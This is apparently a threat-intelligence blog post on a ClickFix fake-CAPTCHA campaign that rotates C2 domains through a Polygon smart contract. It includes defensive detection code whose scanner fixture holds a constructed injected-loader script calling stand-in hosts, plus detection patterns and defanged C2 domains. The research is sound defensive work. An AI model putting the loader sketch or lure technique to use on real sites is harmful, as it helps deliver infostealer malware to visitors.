ClickFix Uses Polygon Blockchain for C2 Domain Distribution
Author: Tadeáš Hájek, Whalebone Threat Intelligence Analyst
Contributor: Tomáš Čajko
Imagine this: you are visiting a familiar website to book a local photographer, check whether a nearby repair shop can replace your battery, or confirm the opening hours of your local pharmacy or restaurant.
The website displays a captcha. That alone does not seem unusual. But this captcha asks you to do something unexpected: open Windows Terminal, paste copied content, and press Enter.
Your guard may be down. After all, this is a website you have visited many times before. You may even know the owner personally. What could happen?
Between March and May, Whalebone Threat Intelligence observed a significant number of websites compromised with a FakeCaptcha/ClickFix variant. This variant presents visitors with a fraudulent Cloudflare “verify you are a human” page and prompts them to open Windows Terminal and paste content that has been inserted into their clipboard. If executed, the command downloads and installs malicious software capable of collecting and extracting sensitive information.

Whalebone Threat Intelligence has also observed the cybercriminal actors behind these ClickFix compromises using the Polygon blockchain for command-and-control domain distribution. We identified a smart contract used to distribute new C2 domains (websites or servers used by cybercriminals to maintain communications with compromised systems) to hijacked sites. Between March and May, we observed 59 C2 domains, rotated on average every 22 hours and distributed through a single Polygon smart contract across hundreds of compromised websites.
This approach helps the attackers maintain access to working command-and-control infrastructure even as older domains are discovered, blocked, or taken down. By placing the domain distribution mechanism on the blockchain, the attackers add resilience to the operation and make disruption more difficult.
Technical Observations
The fraudulent captcha page is served as an external webpage embedded in the compromised page, so the address bar continues to show the legitimate site the visitor came to.
The lure ships with localised text in 57 languages, covering most European, Slavic, East Asian and Southeast Asian locales with right-to-left layout for Arabic and Hebrew, and walks the visitor through opening an elevated Windows Terminal (Win+X → I → Ctrl+V → Enter) so the payload executes with administrator privileges. The clipboard is written the moment the visitor ticks the "I am not a robot" checkbox.
The command written to the clipboard contains an encrypted PowerShell stage; on execution it decrypts itself and performs the following steps:
- Forces TLS 1.2 for the subsequent HTTPS connection.
- Creates a random directory under %LOCALAPPDATA%\Temp\<random>\.
- Downloads an .exe with a random filename from the C2 server controlled by the attacker, retrying up to three times.
- Executes the downloaded file with a hidden window.
- Attempts to delete the dropped .exe after launching it.
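The chain above (obfuscated PowerShell pasted into a terminal, an .exe dropped into a random subdirectory of %LOCALAPPDATA%\Temp, that .exe launched by PowerShell) is what an endpoint detection can key on. The following is an added example written for this article, not Whalebone's or any vendor's detection content; the event schema, paths and command lines are constructed for the example, and the regular expressions are an assumption about how the stages look in process-creation and file-creation telemetry.

```python
import re
from dataclasses import dataclass

# Hypothetical event schema, constructed for this example (not a vendor format):
#   {"type": "process",     "image": ..., "parent": ..., "cmdline": ...}
#   {"type": "file_create", "process": ..., "path": ...}

# An .exe inside a freshly created subdirectory of %LOCALAPPDATA%\Temp
TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\\[^\\]+\.exe$", re.IGNORECASE)
# Signs of an encoded, self-decrypting or hidden PowerShell one-liner
OBFUSCATED_PS = re.compile(
    r"-e(?:nc|ncodedcommand)?\b|frombase64string|\biex\b|invoke-expression|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)
# Consoles a user pastes into; ClickFix walks the victim through Windows Terminal
TERMINALS = {"windowsterminal.exe", "openconsole.exe", "cmd.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_clickfix_chain(events: list[dict]) -> list[Finding]:
    """Return one Finding per stage of the ClickFix execution chain seen in `events`."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            image, parent, cmd = ev["image"], _base(ev["parent"]), ev["cmdline"]
            # Stage 1: the pasted PowerShell stage, launched from a console window
            if _base(image) == "powershell.exe" and parent in TERMINALS and OBFUSCATED_PS.search(cmd):
                findings.append(Finding("pasted_obfuscated_powershell", cmd[:80]))
            # Stage 3: the dropped executable started by that PowerShell
            if parent == "powershell.exe" and TEMP_EXE.search(image):
                findings.append(Finding("temp_exe_launched_by_powershell", image))
        elif ev["type"] == "file_create":
            # Stage 2: PowerShell writes an .exe under Temp\<random>\
            if _base(ev["process"]) == "powershell.exe" and TEMP_EXE.search(ev["path"]):
                findings.append(Finding("powershell_dropped_temp_exe", ev["path"]))
    return findings


def is_clickfix_chain(events: list[dict]) -> bool:
    """Require two distinct stages, so a lone encoded PowerShell command
    (common in legitimate admin tooling) does not fire the alert on its own."""
    return len({f.rule for f in detect_clickfix_chain(events)}) >= 2


# Constructed sample telemetry: the malicious chain, then unrelated benign activity.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPED = r"C:\Users\alice\AppData\Local\Temp\k3j9x\a8f2.exe"  # constructed path
SAMPLE_EVENTS = [
    {"type": "process", "image": PS, "parent": r"C:\constructed\WindowsTerminal.exe",
     "cmdline": "powershell -w hidden -enc BASE64_PLACEHOLDER"},
    {"type": "file_create", "process": PS, "path": DROPPED},
    {"type": "process", "image": DROPPED, "parent": PS, "cmdline": DROPPED},
]
BENIGN_EVENTS = [
    {"type": "process", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"type": "file_create", "process": r"C:\Windows\System32\msiexec.exe",
     "path": r"C:\Users\alice\AppData\Local\Temp\setup.exe"},
]

if __name__ == "__main__":
    for f in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.evidence}")
    print("chain detected:", is_clickfix_chain(SAMPLE_EVENTS))
    print("benign flagged:", is_clickfix_chain(BENIGN_EVENTS))
```

The two-stage requirement is the important design choice: each rule on its own has benign matches (encoded PowerShell in management scripts, installers unpacking into Temp), but PowerShell launched from a console that then writes and starts an .exe in a random Temp subdirectory is the sequence this lure produces.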
The exe file then performs steps consistent with public reports on the Vidar malware, which primarily functions as an infostealer: code designed to collect a variety of sensitive information, including account credentials and credit card details, from an infected computer and exfiltrate it to an attacker.
This modus operandi is consistent with previous reports on ClickFix/FakeCaptcha families. What caught our attention was how frequently the C2 domain changed across the compromised websites. On analysing the HTTP traffic of a hijacked website, we observed unusual connections to multiple public Polygon blockchain nodes:

Each request targeted a single Polygon smart contract, calling the getURL function. The eth_call method is a read-only way to query a contract without signing a transaction or paying gas. The response's result field contained an encoded string with the C2 domain in use at that moment, which then serves the ClickFix fake-CAPTCHA module.
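For a defender who has identified the contract, the same read-only lookup the loader performs yields the current C2 hostname as a blocking indicator, and the on-chain history yields the rotation cadence described later in this article. The block below is an added example written for this article, not code from Whalebone or from the campaign: the contract address and the getURL function selector are placeholders (the real values are deliberately not reproduced), the eth_call response is constructed offline by the block's own encoder, and the rotation log is constructed sample data. The decoder assumes the result is a single ABI-encoded `string`, the standard layout for a Solidity function returning one string.

```python
import json
from statistics import mean

# Placeholders, not the real contract: substitute values from your own investigation.
CONTRACT_ADDRESS = "0x" + "00" * 20   # placeholder contract address
GETURL_SELECTOR = "0x00000000"        # placeholder for the 4-byte selector of getURL()


def build_eth_call(contract: str, selector: str, request_id: int = 1) -> dict:
    """JSON-RPC body for a read-only eth_call against `contract`.

    eth_call needs no signature and costs no gas; `data` is just the function
    selector because getURL takes no arguments.
    """
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    }


def abi_encode_string(value: str) -> str:
    """ABI-encode a single dynamic `string` return value.
    Used here only to construct a sample response offline."""
    raw = value.encode()
    padded_len = (len(raw) + 31) // 32 * 32
    body = (32).to_bytes(32, "big") + len(raw).to_bytes(32, "big") + raw.ljust(padded_len, b"\0")
    return "0x" + body.hex()


def abi_decode_string(result_hex: str) -> str:
    """Decode the `result` field of an eth_call that returns one `string`.

    Layout: 32-byte head offset (0x20), 32-byte length, then UTF-8 bytes padded
    to a multiple of 32. Malformed or truncated data raises ValueError instead
    of yielding a partial hostname.
    """
    if not result_hex.startswith("0x"):
        raise ValueError("result is not 0x-prefixed hex")
    data = bytes.fromhex(result_hex[2:])
    if len(data) < 64:
        raise ValueError("result too short for an ABI string")
    offset = int.from_bytes(data[:32], "big")
    if offset != 32:
        raise ValueError(f"unexpected head offset {offset}")
    length = int.from_bytes(data[32:64], "big")
    if 64 + length > len(data):
        raise ValueError("declared length exceeds payload")
    return data[64:64 + length].decode("utf-8")


def defang(domain: str) -> str:
    """Render a hostname as an indicator that will not auto-link: a.b -> a[.]b."""
    return domain.replace(".", "[.]")


def mean_rotation_hours(records: list[tuple[int, str]]) -> float:
    """Average hours between consecutive domain switches, given on-chain records
    as (unix_timestamp, domain) in any order. Re-writing the same domain is not
    counted as a switch."""
    ordered = sorted(records)
    switches = [ordered[0]]
    for ts, dom in ordered[1:]:
        if dom != switches[-1][1]:
            switches.append((ts, dom))
    if len(switches) < 2:
        return 0.0
    return mean((b[0] - a[0]) / 3600 for a, b in zip(switches, switches[1:]))


# Constructed sample data: a fake eth_call response and a fake rotation log.
SAMPLE_RESPONSE = {"jsonrpc": "2.0", "id": 1, "result": abi_encode_string("example-c2.invalid")}
T0 = 1_700_000_000
SAMPLE_ROTATIONS = [
    (T0, "first-c2.invalid"),
    (T0 + 20 * 3600, "second-c2.invalid"),
    (T0 + 44 * 3600, "third-c2.invalid"),
    (T0 + 44 * 3600 + 600, "third-c2.invalid"),   # same domain rewritten: not a switch
    (T0 + 66 * 3600, "fourth-c2.invalid"),
]

if __name__ == "__main__":
    print(json.dumps(build_eth_call(CONTRACT_ADDRESS, GETURL_SELECTOR)))
    print("current C2:", defang(abi_decode_string(SAMPLE_RESPONSE["result"])))
    print("mean hours between switches:", mean_rotation_hours(SAMPLE_ROTATIONS))
```

Polling the contract on a schedule and feeding the decoded hostname into a resolver blocklist turns the attacker's rotation mechanism into a feed for the defender; the ValueError paths matter because a node returning an error object, or a contract whose return type changes, should fail loudly rather than push an empty or truncated string into the blocklist.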

Utilizing blockchain for C2 distribution presents significant benefits for the threat actor:
- Anonymity. Contract deployment and rotation require no registrar, no hoster, no KYC. The only identifier is a smart contract address.
- Availability. Once written on-chain, the data is replicated across nodes and is not removable through the channels defenders normally use against malicious infrastructure.
- Cheap, frictionless rotation. A single transaction (a few cents on Polygon) repoints the whole campaign to a new C2 host. No re-compromise of host sites is needed; the compromised website carries only a contract address and an RPC list.
- Resolution blends with legitimate Web3 traffic. Lookups go to public RPCs over eth_call, the same endpoints every wallet and dApp uses.
Yet the same anonymity and availability that benefit the attacker also work in defenders' favour. Every rotation is a permanent, timestamped, public record: once a contract is identified, observers gain retroactive visibility into every C2 the campaign has ever used, and visibility into every future rotation as it happens. Blockchain analysis of the observed contract reveals the entire chain of C2 domains rotated throughout the campaign:

The earliest rotation transaction with a C2 domain embedded on this contract is dated 2026-03-29. Since then, 59 C2 domains have been observed, with an average time between switches of 22 hours. As of mid-May 2026, the contract continues to rotate.
The attacker prefers low-trust, low-cost TLDs (.cfd, .lol, .lat, .click, .mom, .cyou, .xyz) and does not appear to follow any consistent naming pattern. Some of the domain names point to a Russian-speaking operator, such as etomoidomen[.]cfd ("this is my domain"), nenadopapa[.]cfd ("don't, daddy") or denegnet[.]click ("no money"). In some instances they employ Russian vulgar slang, such as biggestchlen[.]lol, microchlen[.]lat, yanepidor[.]mom, pohuimne[.]lol or govnol[.]lat. In other instances the domain names are ordinary and unremarkable, such as yoshicity[.]xyz, bulletpop[.]cyou or marmelad[.]lat.
Across the hundreds of hijacked sites we have observed, there is no industry, no language, and no country the threat actor appears to favour. A single recent rotation reached a Dubai vehicle-rental business, a South African educational centre, a Brazilian maritime company, an Indonesian volunteering website and an Italian beauty parlour, among others. What they share is that every site we inspected was running WordPress. Once a vulnerable installation is compromised, the same ClickFix template is dropped, and that site joins the rotation along with every other.
Outlook
The practical recommendations are familiar but worth restating in this context. End users should treat any web page that asks them to open a terminal, paste a command, and press Enter as hostile, regardless of how trusted the host site appears. Site administrators should keep the WordPress core, plugins and themes patched, audit administrative accounts for unfamiliar additions, and review JavaScript injected into theme headers and footers.
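Reviewing injected theme JavaScript can be partly automated by looking for the traits this article describes: an embed from an origin the site does not own, a clipboard write tied to the "I am not a robot" checkbox, and a contract address plus RPC list with an eth_call lookup. The following scanner is an added example written for this article, not a Whalebone tool or a WordPress project component; the signatures, the site hostname, the allowlist and both theme-file samples are constructed, and the scoring threshold is an assumption to tune against your own theme code.

```python
import re
from urllib.parse import urlparse

# Hypothetical signatures for the injected loader's traits, constructed for this example.
SIGNATURES = {
    "clipboard_write": re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I),
    "fake_captcha_text": re.compile(r"not a robot|verify (?:that )?you are (?:a )?human", re.I),
    "eth_call_lookup": re.compile(r"eth_call"),
    "contract_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "rpc_endpoint": re.compile(r"https?://[^\s'\"<>]*rpc[^\s'\"<>]*", re.I),
}
# src attribute of script and iframe tags, including tags built inside JS strings
SRC_ATTR = re.compile(r"<(?:script|iframe)\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def external_sources(html: str, site_host: str, allowlist: tuple = ()) -> list[str]:
    """Hosts of script/iframe sources that are neither the site itself nor allowlisted."""
    hosts = []
    for src in SRC_ATTR.findall(html):
        if src.startswith("//"):
            src = "https:" + src
        if "://" not in src:
            continue                      # relative path, served by the site itself
        host = (urlparse(src).hostname or "").lower()
        trusted = host == site_host or any(host == a or host.endswith("." + a) for a in allowlist)
        if host and not trusted:
            hosts.append(host)
    return hosts


def scan_theme_file(name: str, content: str, site_host: str, allowlist: tuple = ()) -> dict:
    """Score one theme file: one point per signature hit plus one for any external embed."""
    hits = [sig for sig, rx in SIGNATURES.items() if rx.search(content)]
    ext = external_sources(content, site_host, allowlist)
    if ext:
        hits.append("external_embed")
    return {"file": name, "hits": hits, "external_hosts": ext, "score": len(hits)}


def scan_theme(files: dict, site_host: str, allowlist: tuple = (), threshold: int = 3) -> list[dict]:
    """Return reports for files whose score reaches `threshold` (assumed value)."""
    reports = [scan_theme_file(n, c, site_host, allowlist) for n, c in files.items()]
    return [r for r in reports if r["score"] >= threshold]


# Constructed samples: a clean header and a footer carrying an injected loader sketch.
BENIGN_HEADER = """<!DOCTYPE html><html><head>
<script src="/wp-content/themes/shop/js/menu.js"></script>
<script src="https://cdn.example-cdn.invalid/lib.min.js"></script>
</head>"""

INJECTED_FOOTER = """<footer>&copy; shop.example</footer>
<script>
var c="CONTRACT_PLACEHOLDER",r=["https://rpc.node-one.invalid","https://polygon-rpc.node-two.invalid"];
fetch(r[0],{method:"POST",body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",params:[{to:c,data:"0x00000000"},"latest"]})})
.then(x=>x.json()).then(j=>{document.body.insertAdjacentHTML("beforeend",'<iframe src="https://verify.fake-captcha.invalid/"></iframe>')});
document.addEventListener("click",e=>{if(e.target.id=="cb")navigator.clipboard.writeText(cmd)});
</script>
<div>Verify you are human, tick the box: I am not a robot</div>
""".replace("CONTRACT_PLACEHOLDER", "0x" + "ab" * 20)   # placeholder 40-hex address

SAMPLE_THEME = {"header.php": BENIGN_HEADER, "footer.php": INJECTED_FOOTER}
SITE_HOST = "shop.example"
ALLOWLIST = ("example-cdn.invalid",)

if __name__ == "__main__":
    for report in scan_theme(SAMPLE_THEME, SITE_HOST, ALLOWLIST):
        print(f"{report['file']}: score {report['score']}, hits {report['hits']}, external {report['external_hosts']}")
```

Run it over every PHP and JS file of the active theme (and of plugins, since injections are not confined to headers and footers) and treat the external hosts it lists as the candidates to resolve against your blocklist; the allowlist exists because legitimate themes do load third-party CDNs, and a single external embed by itself should not page anyone.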
For network defenders, the intervention point lies at the resolved C2 hostname. Both the fraudulent captcha and the downloaded malicious file are served from the C2, and reaching either requires a DNS lookup first. A DNS resolver with the right threat intelligence can refuse that lookup before any connection is established.
The same mechanism that makes blockchain-based C2 distribution resilient against takedowns also makes the campaign legible to anyone willing to watch. Whalebone Threat Intelligence continues to monitor ClickFix/FakeCaptcha variants and protects our users against the intercepted threats.
Summary
- Attackers behind the ClickFix/FakeCaptcha campaign have begun distributing C2 domains via the Polygon blockchain.
- Between March and May 2026 we observed 59 C2 domains rotated on average every 22 hours, distributed via a single smart contract, across hundreds of compromised WordPress sites.
- The campaign targets end users, who are tricked by a fake Cloudflare CAPTCHA into running a PowerShell command, which downloads and runs infostealer malware.
- Using the blockchain means standard takedown routes (domain registrar, hosting provider) cannot address the distribution layer. The attacker switches to a new domain with a single transaction costing a few cents, with no need to re-compromise any site.